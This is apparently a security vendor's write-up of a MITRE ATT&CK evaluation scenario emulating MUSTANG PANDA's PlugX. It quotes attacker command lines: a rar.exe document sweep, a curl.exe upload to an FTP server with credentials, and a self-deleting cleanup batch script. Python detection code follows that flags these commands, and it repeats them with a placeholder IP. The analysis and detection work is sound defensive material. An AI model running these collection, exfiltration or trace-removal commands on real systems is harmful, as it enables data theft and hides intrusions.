We also noted a disparity: the MITRE emulation used gup.exe and libcurl.dll for sideloading, while the real-world attack involved robotaskbaricon.exe and RoboForm.dll. However, while the emulation differed from the SmugX campaign in this respect, we should note that researchers have observed MUSTANG PANDA using gup.exe and libcurl.dll to execute Cobalt Strike.

Collection and exfiltration

With the PlugX payload established, the emulation moved on to collection and exfiltration. Here, the PERSEUS threat actor used rar.exe to search for and collect files with the following extensions: pdf, doc, ppt, xls, png, jpg and jpeg.

"C:\Program Files\WinRAR\rar.exe" a -r -m5 -ibck -ed -v325m -hpI1HcgjY7bWRA8 -inul -ta202504230000000 C:\Users\Public\Documents\b44d0xUT5BLOi.rar "C:\*.pdf" "C:\*.doc*" "C:\*.ppt*" "C:\*.xls*" "C:\users\*.png" "C:\users\*.jpg" "C:\users\*.jpeg"

The threat actor proceeded to invoke curl.exe to exfiltrate the collected files (as a .rar file named b44d0xUT5BLOi.rar) to their FTP server.

curl.exe -T C:\Users\Public\Documents\b44d0xUT5BLOi.rar ftp://ftp_user:Gracious-Coat@[IP]/dp/ --ftp-create-dirs

This phase contained numerous similarities to the TONESHELL emulation in the ORPHEUS scenario: both WinRAR and curl were used to collect and exfiltrate the sensitive files, and the same FTP server was used for exfiltration. However, there were also some differences. In this sub-scenario, files were collected locally, and the native curl.exe (C:\Windows\System32\curl.exe) binary was executed.
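Both the ORPHEUS and PERSEUS rar.exe command lines above share a staging signature: password-protected headers (-hp), split volumes (-v), recursion (-r), and either a sweep of document extensions or a remote administrative share as the source. The following is an added example written for this article, not Sophos detection content, that parses a WinRAR "a" command line from process telemetry into its switches and targets and scores those traits. The two scenario commands are reproduced from the article; the benign backup command, the extension list, the staging-directory pattern and the score threshold are assumptions for this example.

```python
import re

# Document-type extensions whose bulk collection is worth a second look (assumption).
DOC_EXTS = {"pdf", "doc", "docx", "ppt", "pptx", "xls", "xlsx", "png", "jpg", "jpeg", "rtf", "txt"}
TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')  # quoted token (group 1) or bare token (group 2)


def tokenize(cmd):
    return [quoted or bare for quoted, bare in TOKEN_RE.findall(cmd)]


def parse_rar_add(cmd):
    """Split a `rar.exe a ...` command line into switches, archive path and targets.
    Returns None when the command is not a WinRAR 'add' operation."""
    toks = tokenize(cmd)
    if len(toks) < 2 or not toks[0].lower().endswith("rar.exe") or toks[1].lower() != "a":
        return None
    info = {"password": False, "volumes": None, "recursive": False, "hidden": False,
            "after": None, "excludes": [], "includes": [], "list_file": None,
            "archive": None, "targets": []}
    for t in toks[2:]:
        if t.startswith("-"):
            sw = t[1:]
            if sw.startswith(("hp", "p")):      # -hp<pwd> encrypts names too; -p<pwd> data only
                info["password"] = True
            elif sw.startswith("v"):            # -v<size>: split into volumes
                info["volumes"] = sw[1:]
            elif sw == "r":                     # -r: recurse subdirectories
                info["recursive"] = True
            elif sw in ("ibck", "inul"):        # run in background / suppress all messages
                info["hidden"] = True
            elif sw.startswith("ta"):           # -ta<date>: only files modified after date
                info["after"] = sw[2:]
            elif sw.startswith("x"):            # -x<mask>: exclude
                info["excludes"].append(sw[1:])
            elif sw.startswith("n@"):           # -n@<file>: include masks read from a file
                info["list_file"] = sw[2:]
            elif sw.startswith("n"):            # -n<mask>: include
                info["includes"].append(sw[1:])
        elif info["archive"] is None:
            info["archive"] = t
        else:
            info["targets"].append(t)
    return info


def _ext(mask):
    m = re.search(r"\.(\w+)\*?$", mask)
    return m.group(1).lower() if m else None


def assess_staging(cmd, min_reasons=4):
    """Score a rar.exe command line for data-staging traits; None if it is not a rar add."""
    info = parse_rar_add(cmd)
    if info is None:
        return None
    reasons = []
    if info["password"]:
        reasons.append("password-protected archive")
    if info["volumes"]:
        reasons.append(f"split into {info['volumes']} volumes")
    if info["recursive"]:
        reasons.append("recursive collection")
    if info["hidden"]:
        reasons.append("runs hidden/silent")
    doc_types = {e for e in map(_ext, info["targets"] + info["includes"]) if e in DOC_EXTS}
    if len(doc_types) >= 3:
        reasons.append(f"sweeps {len(doc_types)} document types")
    if any(t.startswith("\\\\") for t in info["targets"]):
        reasons.append("targets remote share")
    if info["list_file"]:
        reasons.append("file list supplied via @file")
    if info["archive"] and re.search(r"\\(Temp|Public)\\", info["archive"], re.IGNORECASE):
        reasons.append("archive written to staging directory")
    return {"archive": info["archive"], "score": len(reasons), "reasons": reasons,
            "staging": len(reasons) >= min_reasons}


# The two command lines quoted in the article, plus a constructed benign backup for contrast.
ORPHEUS_CMD = (r'"C:\Program Files\WinRAR\rar.exe" a -r -v250m -hpj5Tft5lLFFcQK -x*appdata -x*ProgramData* '
               r'-x*Recovery* "-x*System Volume Information*" -x*$RECYCLE.BIN* "-x*Program Files*" '
               r'"-x*Program Files (x86)*" -x*Windows* -x*Python312* -x*crash_dumps* -x*PerfLogs* '
               r'-n@C:\Users\htargaryen\Downloads\files.txt C:\Windows\Temp\A.rar \\10.55.3.105\A$\*')
PERSEUS_CMD = (r'"C:\Program Files\WinRAR\rar.exe" a -r -m5 -ibck -ed -v325m -hpI1HcgjY7bWRA8 -inul '
               r'-ta202504230000000 C:\Users\Public\Documents\b44d0xUT5BLOi.rar "C:\*.pdf" "C:\*.doc*" '
               r'"C:\*.ppt*" "C:\*.xls*" "C:\users\*.png" "C:\users\*.jpg" "C:\users\*.jpeg"')
BENIGN_CMD = r'rar.exe a C:\backup\docs.rar C:\Users\alice\Documents\report.docx'

if __name__ == "__main__":
    for cmd in (ORPHEUS_CMD, PERSEUS_CMD, BENIGN_CMD):
        print(assess_staging(cmd))
```

The ORPHEUS command is flagged on the remote share, the @file list and the Temp archive path as well as the encryption and volume switches; the PERSEUS command is flagged on the seven document types, the hidden/silent switches and the Public directory. The single-file backup scores zero, which is the behaviour a rule like this needs to avoid paging on routine archiving.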

We don't know why MITRE opted to retest using curl.exe (albeit this time as a living-off-the-land binary, or LOLBin) and rar.exe for this phase. As has been publicly reported, PlugX has native capabilities for collection and exfiltration that would likely be more evasive than executing LOLBins already tested in the ORPHEUS sub-scenario.

It's possible that MITRE may have taken inspiration from a Trend Micro report on MUSTANG PANDA, in which researchers described how PUBLOAD executed a very similar curl command to exfiltrate data to an attacker-controlled FTP server:

curl --progress-bar -C --T C:\programdata\IDM.RAR ftp://:@

This report also refers to PLUGX executing rar.exe via cmd.exe with a very similar collection pattern (although there is no reference to curl.exe being used for exfiltration):

"RAR.exe a -r -m3 -tk -ed -dh -v4500m -hp -ibck -ta -n*.doc* -n*.rtf* -n*.xls* -n*.pdf* -n*.ppt* -n*.jpg* -n*.cdr* -n*.dwg* -n*.png* -n*.psd* -n*.JPE* -n*.BMP* -n*.TIF* -n*.dib* ".RAR" """

Indicator removal

In the final part of the PERSEUS sub-scenario, the malware was uninstalled using a self-cleanup script which operates as follows:

First, gup.exe (PlugX) dropped del_WinGupSvc.bat.

Next, the batch file was executed with a self-deletion command to remove the batch script itself once execution was complete:

cmd /c "echo @echo off > C:\Users\ccole\AppData\Local\Temp\del_WinGupSvc.bat && echo ping 127.0.0.1 -n 5 ^>nul >> C:\Users\ccole\AppData\Local\Temp\del_WinGupSvc.bat && echo del %~f0 >> C:\Users\ccole\AppData\Local\Temp\del_WinGupSvc.bat && C:\Users\ccole\AppData\Local\Temp\del_WinGupSvc.bat"

The script uninstalled the persistence mechanism, the MSI package, and gup.exe:

reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WinGupSvc" /f
msiexec /uninstall "C:\Users\ccole\Downloads\2025p2.msi" /quiet
taskkill /f /im gup.exe

Here’s what we observed in Sophos XDR regarding this activity:

Figure 10: Sophos XDR lineage showing the observed self-deletion phase

This indicator removal step emulates the documented self-delete command in PlugX (identified as 0x1005). Its implementation is very similar to the details reported by Sekoia, where, as part of the self-delete process, researchers observed use of the batch script del_AsvastSvcpCP.bat.

2025 marked the fifth year that Sophos has participated in MITRE ATT&CK Enterprise Evaluations. As in previous years, the focus on end-to-end attack chains and realism has made the evaluation an extremely valuable exercise in assessing our capabilities and those of other vendors. We also welcome MITRE’s emphasis on transparency.

Like any form of emulation, much of the value of these evaluations comes from how accurate and realistic their scenarios are. As with the 2024 evaluations, we noted that in several, minor instances, MITRE’s scenarios deviated from what we know about real-world attacks. In some cases, this may have been due to unavoidable constraints related to developing and executing the scenarios. In others, it may have been the result of certain characteristics of the emulated threat actors. For instance, the MUSTANG PANDA threat actor, because of its nature and objectives, is more likely to operate in a controlled, coordinated manner. In contrast, SCATTERED SPIDER – believed to be more of a loose, amorphous collective – has more mutable and flexible TTPs, meaning that MITRE perhaps had more flexibility when designing the scenario. Regardless, in our assessment, the level of realism was high, and the overall resemblance to known campaigns and threat actors remains very strong – making this a valuable exercise.

Transparent, realistic evaluations, in which multiple vendors participate, benefit not only vendors themselves, but also customers, and, consequently, wider society. We look forward to continuing to participate in these evaluations in the future, and to reporting our experiences and findings.
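As an added example (not code from the Sophos post or from MITRE’s emulation), the following Python sketches how a defender might flag the collection, exfiltration and indicator-removal command lines described in the PERSEUS sub-scenario above, and correlate the rar archive with its later curl upload. The sample command lines are constructed to mirror those above, 192.0.2.10 stands in for the redacted FTP server, and the ATT&CK technique IDs in the comments are my own mapping.

```python
import re

# Document extensions the emulated PERSEUS actor collected with rar.exe.
SENSITIVE_EXT = ("pdf", "doc", "ppt", "xls", "png", "jpg", "jpeg")

def rar_collection(cmd):
    """rar.exe 'a' (add) with a -hp password and wildcards over document types (T1560.001)."""
    t = cmd.lower()
    return ("rar.exe" in t and " a " in t and re.search(r"\s-hp\S+", t) is not None
            and any(f"*.{e}" in t for e in SENSITIVE_EXT))
def curl_ftp_upload(cmd):
    """curl -T <file> to an ftp:// URL that embeds user:pass@ credentials (T1048.003)."""
    return ("curl" in cmd.lower() and re.search(r"\s-T\s", cmd) is not None
            and re.search(r"ftp://[^/\s]+:[^/\s]+@", cmd, re.I) is not None)
def self_deleting_batch(cmd):
    """cmd.exe writing a .bat whose last line is 'del %~f0', so it deletes itself (T1070.004)."""
    return ".bat" in cmd.lower() and "echo del %~f0" in cmd.lower()
def run_key_removal(cmd):
    """reg delete of a value under ...\\CurrentVersion\\Run: persistence being torn down (T1547.001)."""
    return re.search(r'reg(\.exe)?\s+delete\s+"?hk\S*\\run"?\s+/v', cmd, re.I) is not None

DETECTORS = {"rar_collection": rar_collection, "curl_ftp_upload": curl_ftp_upload,
             "self_deleting_batch": self_deleting_batch, "run_key_removal": run_key_removal}

def classify(cmdlines):
    """(index, matching detector names) for every command line that fired."""
    return [(i, names) for i, cmd in enumerate(cmdlines)
            if (names := [n for n, fn in DETECTORS.items() if fn(cmd)])]

def archive_path(cmd):
    """Lower-cased .rar path written by rar.exe or uploaded by curl -T ('' if none)."""
    m = re.search(r'(?:-T\s+|\s)"?([^"\s]+\.rar)(?=["\s]|$)', cmd, re.I)
    return m.group(1).lower() if m else ""

def correlate(cmdlines):
    """Pair each rar collection with a later curl upload of the same archive."""
    return [(i, j) for i, a in enumerate(cmdlines) if rar_collection(a)
            for j in range(i + 1, len(cmdlines))
            if curl_ftp_upload(cmdlines[j]) and archive_path(cmdlines[j]) == archive_path(a)]

# Constructed sample command lines modelled on the PERSEUS activity above; 192.0.2.10 is a placeholder.
SAMPLE_CMDS = [
    r'"C:\Program Files\WinRAR\rar.exe" a -r -m5 -ibck -ed -v325m -hpI1HcgjY7bWRA8 -inul '
    r'C:\Users\Public\Documents\b44d0xUT5BLOi.rar "C:\*.pdf" "C:\*.doc*" "C:\users\*.jpg"',
    r'curl.exe -T C:\Users\Public\Documents\b44d0xUT5BLOi.rar ftp://ftp_user:Gracious-Coat@192.0.2.10/dp/ --ftp-create-dirs',
    r'cmd /c "echo @echo off > C:\Users\ccole\AppData\Local\Temp\del_WinGupSvc.bat && echo ping 127.0.0.1 -n 5 ^>nul '
    r'>> C:\Users\ccole\AppData\Local\Temp\del_WinGupSvc.bat && echo del %~f0 >> C:\Users\ccole\AppData\Local\Temp\del_WinGupSvc.bat"',
    r'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WinGupSvc" /f',
    r'"C:\Program Files\WinRAR\rar.exe" a -r backup.rar "D:\builds\*.log"',  # benign: no password, no documents
]
```

Running classify(SAMPLE_CMDS) flags the first four lines, one detector each, and correlate(SAMPLE_CMDS) links the rar archive creation to its curl upload while the benign backup stays silent.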
